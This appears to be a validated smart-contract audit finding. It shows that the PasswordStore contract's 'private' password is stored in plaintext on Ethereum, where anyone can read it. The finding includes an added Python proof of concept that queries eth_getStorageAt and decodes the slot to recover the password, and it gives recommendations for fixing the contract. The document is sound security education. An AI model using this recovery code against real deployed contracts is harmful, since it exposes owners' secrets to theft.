Submission Details
Severity: high
Valid

Insecure Data Storage on the Ethereum Blockchain

Summary

The PasswordStore smart contract is meant to store a private password that only the owner can retrieve, but the data is written in plaintext to Ethereum storage, and contract storage is readable by anyone regardless of the Solidity access control placed on the getter.

Vulnerability Details

PasswordStore does restrict calls to getPassword to the owner, but that check only governs what Solidity code may call. Ethereum is a public blockchain: every contract's storage is replicated on every full node, and any party can read any storage slot of any contract through a standard, unauthenticated RPC call (eth_getStorageAt, or `cast storage <address> <slot>` with Foundry). The `private` visibility on the password variable only hides it from other contracts at the Solidity level; it neither encrypts nor conceals the value in storage. The plaintext password is also visible in the calldata of the transaction that stored it. The owner-only restriction on getPassword therefore provides no confidentiality: the password can be recovered by anyone without ever calling the contract.
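The following is an added example, not code from the PasswordStore contest or its author, showing what "anyone can read storage" means in practice: it builds the JSON-RPC request a node answers with no authentication and decodes the returned 32-byte word as a Solidity `string`. The storage word is constructed here rather than fetched, and the slot index (slot 1) is an assumption, since the page does not reproduce the contract source.

```python
"""Decode a Solidity `string private` variable straight out of raw storage."""

# Constructed 32-byte storage word, shaped as eth_getStorageAt would return it
# for the short Solidity string "myPassword". Slot 1 is assumed; the page does
# not reproduce the contract layout.
LEAKED_SLOT_1 = "0x6d7950617373776f7264" + "00" * 21 + "14"


def get_storage_at_request(contract: str, slot: int, request_id: int = 1) -> dict:
    """Build the JSON-RPC body that any Ethereum node answers without auth.

    Equivalent to `cast storage <contract> <slot>` in Foundry. The returned
    word is public no matter what visibility modifier the variable carries.
    """
    return {
        "jsonrpc": "2.0",
        "id": request_id,
        "method": "eth_getStorageAt",
        "params": [contract, hex(slot), "latest"],
    }


def decode_string_slot(word_hex: str):
    """Interpret one storage word as a Solidity `string`.

    Strings of at most 31 bytes are packed into the slot itself: data is
    left-aligned and the lowest byte holds 2 * length. Longer strings keep
    2 * length + 1 in the slot and the bytes at keccak256(slot) onwards.
    Returns ("short", text) or ("long", byte_length).
    """
    raw = bytes.fromhex(word_hex[2:] if word_hex.startswith("0x") else word_hex)
    if len(raw) != 32:
        raise ValueError("a storage word is exactly 32 bytes")
    marker = raw[-1]
    if marker & 1:
        # Long form: the whole word is 2*len + 1; the data lives elsewhere.
        return ("long", (int.from_bytes(raw, "big") - 1) // 2)
    length = marker // 2
    if length > 31:
        raise ValueError("malformed short-string marker")
    return ("short", raw[:length].decode("utf-8"))


def encode_short_string_slot(text: str) -> str:
    """Inverse of decode_string_slot for the short form; handy for fixtures."""
    data = text.encode("utf-8")
    if len(data) > 31:
        raise ValueError("short form only holds up to 31 bytes")
    word = data + b"\x00" * (31 - len(data)) + bytes([2 * len(data)])
    return "0x" + word.hex()


def recover_password(word_hex: str) -> str:
    """Return the plaintext password held in a short-string slot."""
    kind, value = decode_string_slot(word_hex)
    if kind == "long":
        raise ValueError(
            f"{value}-byte string; data continues at keccak256(slot), read those words too"
        )
    return value


if __name__ == "__main__":
    print(get_storage_at_request("0x" + "00" * 20, 1))
    print(recover_password(LEAKED_SLOT_1))
```

Against a live deployment the only change is to POST the request body to an RPC endpoint and pass the `result` field to `recover_password`; no owner key is involved at any step. Passwords longer than 31 bytes need the extra reads at keccak256(slot), which requires a Keccak-256 implementation not included here.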

Impact

Anyone with access to an Ethereum node or a public block explorer can read the stored password directly from the contract's storage, without calling getPassword, so the owner-only restriction gives a false sense of confidentiality. Because the value is stored in plaintext, the exposure is permanent: historical state and the original setter transaction remain available even if the password is later changed.

Tools Used

Manual code review.

Recommendations

Do not store secrets in plaintext on-chain. If a reference to the password must live on-chain, encrypt it off-chain with a key that never touches the chain and store only the ciphertext, or store only a salted commitment (hash) and keep the secret itself off-chain; note that a hash of a low-entropy password can still be brute-forced from public storage. With the secret kept off-chain, an owner-only getPassword view function no longer serves a purpose and should be removed so the interface does not imply a confidentiality the chain cannot provide.

Updates

Lead Judging Commences

inallhonesty Lead Judge
about 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible to the contract they are defined in, not to derived contracts. In this case, private doesn't mean secret/confidential.
